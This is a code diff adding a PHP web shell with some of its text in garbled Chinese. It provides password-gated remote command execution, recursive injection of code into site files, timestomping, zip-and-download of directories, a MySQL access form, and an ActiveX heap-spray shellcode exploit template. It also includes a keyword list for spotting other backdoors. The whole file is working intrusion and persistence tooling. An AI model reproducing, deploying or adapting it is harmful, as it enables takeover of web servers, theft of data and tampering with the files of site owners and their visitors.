+
+function File_Size($size)
+{ 
+        $kb = 1024;         // Kilobyte
+        $mb = 1024 * $kb;   // Megabyte
+        $gb = 1024 * $mb;   // Gigabyte
+        $tb = 1024 * $gb;   // Terabyte
+        if($size < $kb)
+        {
+            return $size." B";
+        }
+        else if($size < $mb)
+        { 
+            return round($size/$kb,2)." K";
+        }
+        else if($size < $gb)
+        { 
+            return round($size/$mb,2)." M";
+        }
+        else if($size < $tb)
+        { 
+            return round($size/$gb,2)." G";
+        }
+        else
+        { 
+            return round($size/$tb,2)." T";
+        }
+ }
+
+function File_Read($filename)
+{
+	$handle = @fopen($filename,"rb");
+	$filecode = @fread($handle,@filesize($filename));
+	@fclose($handle);
+	return $filecode;
+}
+
+function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
+function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
+
+function do_phpfun($cmd,$fun) {
+	$res = '';
+	switch($fun){
+		case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
+		case "shell_exec": $res = @shell_exec($cmd); break;
+		case "system": @ob_start();	@system($cmd); $res = @ob_get_contents();	@ob_end_clean();break;
+		case "passthru": @ob_start();	@passthru($cmd); $res = @ob_get_contents();	@ob_end_clean();break;
+		case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f))	$res .= @fread($f,1024);} @pclose($f);break;
+	}
+	return $res;
+}
+
+function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
+	$show = do_show($dir);
+	foreach($show as $files){
+		if(is_dir($files) && $bool){
+			do_passreturn($files,$code,$type,$bool,$filetype,$shell);
+		}else{
+			if($files == $shell) continue;
+			switch($type){
+				case "guama":
+				if(debug($files,$filetype)){
+					do_write($files,"ab","\n".$code) ? html_n("�ɹ�--> $files<br>") : html_n("ʧ��--> $files<br>");
+				}
+				break;
+				case "qingma":
+				$filecode = @file_get_contents($files);
+				if(stristr($filecode,$code)){
+					$newcode = str_replace($code,'',$filecode);
+					do_write($files,"wb",$newcode) ? html_n("�ɹ�--> $files<br>") : html_n("ʧ��--> $files<br>");
+				}
+				break;
+				case "tihuan":
+				$filecode = @file_get_contents($files);
+				if(stristr($filecode,$code)){
+					$newcode = str_replace($code,$filetype,$filecode);
+					do_write($files,"wb",$newcode) ? html_n("�ɹ�--> $files<br>") : html_n("ʧ��--> $files<br>");
+				}
+				break;
+				case "scanfile":
+				$file = explode('/',$files);
+				if(stristr($file[count($file)-1],$code)){
+					html_a("?eanver=editr&p=$files",$files);
+					echo '<br>';
+				}
+				break;
+				case "scancode":
+				$filecode = @file_get_contents($files);
+				if(stristr($filecode,$code)){
+					html_a("?eanver=editr&p=$files",$files);
+					echo '<br>';
+				}
+				break;
+				case "scanphp":
+				$fileinfo = pathinfo($files);
+				if($fileinfo['extension'] == $code){
+					$filecode = @file_get_contents($files);
+					if(muma($filecode,$code)){
+						html_a("?eanver=editr&p=".urlencode($files),"�༭");
+						html_a("?eanver=del&p=".urlencode($files),"ɾ��");
+						echo $files.'<br>';
+					}
+				}
+				break;
+			}
+		}
+	}
+}
+
+
+class PHPzip{
+
+	var $file_count = 0 ;
+	var $datastr_len   = 0;
+	var $dirstr_len = 0;
+	var $filedata = '';
+	var $gzfilename;
+	var $fp;
+	var $dirstr='';
+
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+
+        if ($timearray['year'] < 1980) {
+        	$timearray['year']    = 1980;
+        	$timearray['mon']     = 1;
+        	$timearray['mday']    = 1;
+        	$timearray['hours']   = 0;
+        	$timearray['minutes'] = 0;
+        	$timearray['seconds'] = 0;
+        }
+
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+               ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+
+	function startfile($path = 'QQqun555227.zip'){
+		$this->gzfilename=$path;
+		$mypathdir=array();
+		do{
+			$mypathdir[] = $path = dirname($path);
+		}while($path != '.');
+		@end($mypathdir);
+		do{
+			$path = @current($mypathdir);
+			@mkdir($path);
+		}while(@prev($mypathdir));
+
+		if($this->fp=@fopen($this->gzfilename,"w")){
+			return true;
+		}
+		return false;
+	}
+
+    function addfile($data, $name){
+        $name     = str_replace('\\', '/', $name);
+		
+		if(strrchr($name,'/')=='/') return $this->adddir($name);
+		
+        $dtime    = dechex($this->unix2DosTime());
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $c_len   = strlen($zdata);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		
+        $datastr  = "\x50\x4b\x03\x04";
+        $datastr .= "\x14\x00"; 
+        $datastr .= "\x00\x00";
+        $datastr .= "\x08\x00"; 
+        $datastr .= $hexdtime; 
+        $datastr .= pack('V', $crc);
+        $datastr .= pack('V', $c_len);
+        $datastr .= pack('V', $unc_len);
+        $datastr .= pack('v', strlen($name));
+        $datastr .= pack('v', 0); 
+        $datastr .= $name;
+        $datastr .= $zdata;
+        $datastr .= pack('V', $crc); 
+        $datastr .= pack('V', $c_len);
+        $datastr .= pack('V', $unc_len);
+
+
+		fwrite($this->fp,$datastr);
+		$my_datastr_len = strlen($datastr);
+		unset($datastr);
+		
+        $dirstr  = "\x50\x4b\x01\x02";
+        $dirstr .= "\x00\x00"; 
+        $dirstr .= "\x14\x00";
+        $dirstr .= "\x00\x00";
+        $dirstr .= "\x08\x00";
+        $dirstr .= $hexdtime;
+        $dirstr .= pack('V', $crc); 
+        $dirstr .= pack('V', $c_len); 
+        $dirstr .= pack('V', $unc_len);       	// uncompressed filesize
+        $dirstr .= pack('v', strlen($name) ); 	// length of filename
+        $dirstr .= pack('v', 0 );             	// extra field length
+        $dirstr .= pack('v', 0 );             	// file comment length
+        $dirstr .= pack('v', 0 );             	// disk number start
+        $dirstr .= pack('v', 0 );             	// internal file attributes
+        $dirstr .= pack('V', 32 );            	// external file attributes - 'archive' bit set
+        $dirstr .= pack('V',$this->datastr_len ); // relative offset of local header
+        $dirstr .= $name;
+		
+		$this->dirstr .= $dirstr;	//Ŀ¼��Ϣ
+		
+		$this -> file_count ++;
+		$this -> dirstr_len += strlen($dirstr);
+		$this -> datastr_len += $my_datastr_len;	
+    }
+
+	function adddir($name){ 
+		$name = str_replace("\\", "/", $name); 
+		$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
+		
+		$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
+		$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); 
+
+		fwrite($this->fp,$datastr);	//д���µ��ļ�����
+		$my_datastr_len = strlen($datastr);
+		unset($datastr);
+		
+		$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
+		$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
+		$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); 
+		$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name; 
+		
+		$this->dirstr .= $dirstr;	//Ŀ¼��Ϣ
+
+		$this -> file_count ++;
+		$this -> dirstr_len += strlen($dirstr);
+		$this -> datastr_len += $my_datastr_len;	
+	}
+
+
+	function createfile(){
+		//ѹ����������Ϣ,�����ļ�����,Ŀ¼��Ϣ��ȡָ��λ�õ���Ϣ
+		$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
+					pack('v', $this -> file_count) .
+					pack('v', $this -> file_count) .
+					pack('V', $this -> dirstr_len) .
+					pack('V', $this -> datastr_len) .
+					"\x00\x00";
+
+		fwrite($this->fp,$this->dirstr.$endstr);
+		fclose($this->fp);
+	}
+ }
+
+function File_Act($array,$actall,$inver,$REAL_DIR)
+{
+	if(($count = count($array)) == 0) return '��ѡ���ļ�';
+	if($actall == 'e')
+	{
+     function listfiles($dir=".",$faisunZIP,$mydir){
+		$sub_file_num = 0;
+		if(is_file($mydir."$dir")){
+		  if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir")){
+			$faisunZIP -> addfile(file_get_contents($mydir.$dir),"$dir");
+			return 1;
+		  }
+			return 0;
+		}
+		
+		$handle=opendir($mydir."$dir");
+		while ($file = readdir($handle)) {
+		   if($file=="."||$file=="..")continue;
+		   if(is_dir($mydir."$dir/$file")){
+			 $sub_file_num += listfiles("$dir/$file",$faisunZIP,$mydir);
+		   }
+		   else {
+		   	   if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir/$file")){
+			     $faisunZIP -> addfile(file_get_contents($mydir.$dir."/".$file),"$dir/$file");
+				 $sub_file_num ++;
+				}
+		   }
+		}
+		closedir($handle);
+		if(!$sub_file_num) $faisunZIP -> addfile("","$dir/");
+		return $sub_file_num;
+	}
+
+   function num_bitunit($num){
+	  $bitunit=array(' B',' KB',' MB',' GB');
+	  for($key=0;$key<count($bitunit);$key++){
+		if($num>=pow(2,10*$key)-1){ //1023B ����ʾΪ 1KB
+		  $num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
+		}
+	  }
+	  return $num_bitunit_str;
+   }
+
+	$mydir=$REAL_DIR.'/';
+	if(is_array($array)){
+		$faisunZIP = new PHPzip;
+		if($faisunZIP -> startfile("$inver")){
+			$filenum = 0;
+			foreach($array as $file){
+				$filenum += listfiles($file,$faisunZIP,$mydir);
+			}
+			$faisunZIP -> createfile();
+			return "ѹ�����,������ $filenum ���ļ�.<br><a href='$inver'>������� $inver (".num_bitunit(filesize("$inver")).")</a>";
+		}else{
+			return "$inver ����д��,����·����Ȩ���Ƿ���ȷ.<br>";
+		}
+	}else{
+		return "û��ѡ����ļ���Ŀ¼.<br>";
+	}
+
+
+	}
+	$i = 0;
+	while($i < $count)
+	{
+		$array[$i] = urldecode($array[$i]);
+		switch($actall)
+		{
+			case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '·������'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '���Ƶ�'.$inver.'Ŀ¼'; break;
+			case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = 'ɾ��'; break;
+			case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '����ֵ����'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '�����޸�Ϊ'.$inver; break;
+			case "d" : @touch($array[$i],strtotime($inver)); $msg = '�޸�ʱ��Ϊ'.$inver; break;
+		}
+		$i++;
+	}
+	return '��ѡ�ļ�'.$msg.'���';
+}
+
+	function start_unzip($tmp_name,$new_name,$todir='zipfile'){
+		$z = new Zip;
+		$have_zip_file=0;
+		$upfile = array("tmp_name"=>$tmp_name,"name"=>$new_name);
+		if(is_file($upfile[tmp_name])){
+			$have_zip_file = 1;
+			echo "<br>���ڽ�ѹ: $upfile[name]<br><br>";
+			if(preg_match('/\.zip$/mis',$upfile[name])){
+				$result=$z->Extract($upfile[tmp_name],$todir);
+				if($result==-1){
+					echo "<br>�ļ� $upfile[name] ����.<br>";
+				}
+				echo "<br>���,������ $z->total_folders ��Ŀ¼,$z->total_files ���ļ�.<br><br><br>";
+			}else{
+				echo "<br>$upfile[name] ���� zip �ļ�.<br><br>";			
+			}
+			if(realpath($upfile[name])!=realpath($upfile[tmp_name])){
+				@unlink($upfile[name]);
+				rename($upfile[tmp_name],$upfile[name]);
+			}
+		}
+	}
+
+function muma($filecode,$filetype){
+	$dim = array(
+	"php" => array("eval(","exec("),
+	"asp" => array("WScript.Shell","execute(","createtextfile("),
+	"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),
+	"jsp" => array("runtime.exec(")
+	);
+	foreach($dim[$filetype] as $code){
+		if(stristr($filecode,$code)) return true;
+	}
+}
+
+function debug($file,$ftype){
+	$type=explode('|',$ftype);
+	foreach($type as $i){
+		if(stristr($file,$i))	return true;
+	}
+}
+
+/*---string---*/
+
+function str_path($path){
+	return str_replace('//','/',$path);
+}
+
+function msg($msg){
+	die("<script>window.alert('".$msg."');history.go(-1);</script>");
+}
+
+function uppath($nowpath){
+	$nowpath = str_replace('\\','/',dirname($nowpath));
+	return urlencode($nowpath);
+}
+
+function xxstr($key){
+	$temp = str_replace("\\\\","\\",$key);
+	$temp = str_replace("\\","\\\\",$temp);
+	return $temp;
+}
+
+/*---html---*/
+
+function html_ta($url,$name){
+	html_n("<a href=\"$url\" target=\"_blank\">$name</a>");
+}
+
+function html_a($url,$name,$where=''){
+	html_n("<a href=\"$url\" $where>$name</a> ");
+}
+
+function html_img($url){
+	html_n("<img src=\"?img=$url\" border=0>");
+}
+
+function back(){
+	html_n("<input type='button' value='����' onclick='history.back();'>");
+}
+
+function html_radio($namei,$namet,$v1,$v2){
+	html_n('<input type="radio" name="return" value="'.$v1.'" checked>'.$namei);
+	html_n('<input type="radio" name="return" value="'.$v2.'">'.$namet.'<br><br>');
+}
+
+function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
+	if($mode){
+		html_n("<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text");
+	}else{
+		html_n("$text <input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\">");
+	}
+}
+
+function html_text($name,$cols,$rows,$value = ''){
+	html_n("<br><br><textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" >$value</textarea>");
+}
+
+function html_select($array,$mode = '',$change = '',$name = 'class'){
+	html_n("<select name=$name $change>");
+	foreach($array as $name => $value){
+		if($name == $mode){
+			html_n("<option value=\"$name\" selected>$value</option>");
+		}else{
+			html_n("<option value=\"$name\">$value</option>");
+		}
+	}
+	html_n("</select>");
+}
+
+function html_font($color,$size,$name){
+	html_n("<font color=\"$color\" size=\"$size\">$name</font>");
+}
+
+function GetHtml($url)
+{
+      $c = '';
+      $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
+      if(function_exists('fsockopen')){
+    	$link = parse_url($url);
+	    $query=$link['path'].'?'.$link['query'];
+	    $host=strtolower($link['host']);
+	    $port=$link['port'];
+	    if($port==""){$port=80;}
+	    $fp = fsockopen ($host,$port, $errno, $errstr, 10);
+	    if ($fp)
+	      {
+		    $out = "GET /{$query} HTTP/1.0\r\n"; 
+		    $out .= "Host: {$host}\r\n"; 
+		    $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n"; 
+		    $out .= "Connection: Close\r\n\r\n"; 
+		    fwrite($fp, $out);
+		    $inheader=1;
+		    while(!feof($fp)) 
+		         {$line=fgets($fp,4096);	
+			      if($inheader==0){$contents.=$line;}
+			      if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
+		    } 
+		    fclose ($fp); 
+		    $c= $contents;
+	      }
+        }
+		if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
+            $ch = curl_init();
+            curl_setopt($ch, CURLOPT_URL, $url);
+            curl_setopt($ch, CURLOPT_TIMEOUT, 15);
+            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
+            curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
+            $c = curl_exec($ch);
+            curl_close($ch);
+        }
+        if(empty($c) && ini_get('allow_url_fopen')){
+            $c = file_get_contents($url);
+        }
+		if(empty($c)){
+            echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');";
+        }
+		if(!empty($c))
+		{
+        return $c;
+		}
+ }
+
+function html_main($path,$shellname){
+$serverip=gethostbyname($_SERVER['SERVER_NAME']);
+print<<<END
+<html><title>{$shellname}</title>
+<table width='100%'><tr><td width='150' align='center'>{$serverip}</td><td><form method='GET' target='main'><input type='hidden' name='eanver' value='main'><input name='path' style='width:100%' value='{$path}'></td><td width='140' align='center'><input name='Submit' type='submit' value='����'> <input type='submit' value='ˢ��' onclick='main.location.reload()'></td></tr></form></table>
+END;
+	html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'>");
+	html_n("</iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'>");
+	html_n("</iframe></td></tr></table></html>");
+}
+
+function islogin($shellname,$myurl){
+print<<<END
+<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>
+<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='{$myurl}' target='_blank'>{$shellname}</a><br><br><form method='post'>�������룺<input name='envlpass' type='password' size='22'> <input type='submit' value='��½'><br><br><br><font color=#3399FF>�������ڷǷ���;��������߸Ų�����</font><br></div></center>
+END;
+}
+
+function html_sql(){
+	html_input("text","sqlhost","localhost","<br>MYSQL��ַ","30");
+	html_input("text","sqlport","3306","<br>MYSQL�˿�","30");
+	html_input("text","sqluser","root","<br>MYSQL�û�","30");
+	html_input("password","sqlpass","","<br>MYSQL����","30");
+	html_input("text","sqldb","dbname","<br>MYSQL����","30");
+	html_input("submit","sqllogin","��½","<br>");
+	html_n('</form>');
+}
+
+function Mysql_Len($data,$len)
+{
+	if(strlen($data) < $len) return $data;
+	return substr_replace($data,'...',$len);
+}
+
+function html_n($data){
+	echo "$data\n";
+}
+
+/*---css---*/
+
+function css_img($img){
+	$images = array(
+	"exe"=>
+	"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+	"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+	"xhIAOw==",
+	"dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".
+	"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".
+	"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+	"txt"=>
+	"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+	"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+	"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+	"html"=>
+	"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+	"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+	"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+	"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+	"ADs=",
+	"js"=>
+	"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+	"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+	"a00AjYYBbc/o9HjNniUAADs=",
+	"xml"=>
+	"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+	"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+	"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+	"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+	"IQA7",
+	"mp3"=>
+	"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+	"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+	"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+	"img"=>
+	"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+	"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+	"FxEAOw==",
+	"title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".
+	"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+	"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".
+	"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
+	"rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".
+    "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".
+    "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".
+    "aNOmRcjVj02tPxPCzfkvIAA7"
+	);
+  header('Content-type: image/gif');
+  echo base64_decode($images[$img]);
+  die();
+}
+
+function css_showimg($file){
+	$it=substr($file,-3);
+	switch($it){
+		case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img';break;
+		case "htm": case "tml": return 'html';break;
+		case "exe": case "com": return 'exe';break;
+		case "xml": case "doc": return 'xml';break;
+		case ".js": case "vbs": return 'js';break;
+		case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return 'mp3';break;
+		case "rar": case "tar": case ".gz": case "zip":case "iso": return 'rar';break;
+  	default: return 'txt';break;
+	}
+}
+
+function css_js($num,$code = ''){
+	if($num == "shellcode"){
+		return '<%@ LANGUAGE="JavaScript" %>
+		<%
+		var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
+		var shellcode = unescape("'.$code.'");
+		var bigblock = unescape("%u9090%u9090");
+		var headersize = 20;
+		var slackspace = headersize+shellcode.length;
+		while (bigblock.length<slackspace) bigblock+=bigblock;
+		fillblock = bigblock.substring(0, slackspace);
+		block = bigblock.substring(0, bigblock.length-slackspace);
+		while(block.length+slackspace<0x40000) block = block+block+fillblock;
+		memory = new Array();
+		for (x=0; x<300; x++) memory[x] = block + shellcode;
+		var buffer = "";
+		while (buffer.length < 1319) buffer+="A";
+		buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
+		act.hgs_startNotify(buffer);
+		%>';
+	}
+	html_n('<script language="javascript">');
+	if($num == "1"){
+	html_n('	function rusurechk(msg,url){
+		smsg = "FileName:[" + msg + "]\nPlease Input New File:";
+		re = prompt(smsg,msg);
+		if (re){
+			url = url + re;
+			window.location = url;
+		}
+	}
+	function rusuredel(msg,url){
+		smsg = "Do You Suer Delete [" + msg + "] ?";
+		if(confirm(smsg)){
+			URL = url + msg;
+			window.location = url;
+		} 
+	}
+	function Delok(msg,gourl)
+	{
+		smsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
+		if(confirm(smsg))
+		{
+			if(gourl == \'b\')
+			{
+				document.getElementById(\'actall\').value = escape(gourl);
+				document.getElementById(\'fileall\').submit();
+			}
+			else window.location = gourl;
+		}
+	}
+	function CheckAll(form)
+	{
+		for(var i=0;i<form.elements.length;i++)
+		{
+			var e = form.elements[i];
+			if (e.name != \'chkall\')
+			e.checked = form.chkall.checked;
+		}
+	}
+	function CheckDate(msg,gourl)
+	{
+		smsg = "��ǰ�ļ�ʱ��:[" + msg + "]";
+		re = prompt(smsg,msg);
+		if(re)
+		{
+			var url = gourl + re;
+			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
+			var r = re.match(reg);
+			if(r==null){alert(\'���ڸ�ʽ����ȷ!��ʽ:yyyy-mm-dd hh:mm:ss\');return false;}
+			else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}
+		}
+	}
+	function SubmitUrl(msg,txt,actid)
+	{
+		re = prompt(msg,unescape(txt));
+		if(re)
+		{
+			document.getElementById(\'actall\').value = actid;
+			document.getElementById(\'inver\').value = escape(re);
+			document.getElementById(\'fileall\').submit();
+		}
+	}');
+	}elseif($num == "2"){
+	html_n('var NS4 = (document.layers);
+var IE4 = (document.all);
+var win = this;
+var n = 0;
+function search(str){
+	var txt, i, found;
+	if(str == "")return false;
+	if(NS4){
+		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
+		if(n == 0) alert(str + " ... Not-Find")
+	}
+	if(IE4){
+		txt = win.document.body.createTextRange();
+		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
+			txt.moveStart("character", 1);
+			txt.moveEnd("textedit")
+		}
+		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
+		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
+	}
+	return false
+}
+function CheckDate(){
+	var re = document.getElementById(\'mtime\').value;
+	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
+	var r = re.match(reg);
+	if(r==null){alert(\'���ڸ�ʽ����ȷ!��ʽ:yyyy-mm-dd hh:mm:ss\');return false;}
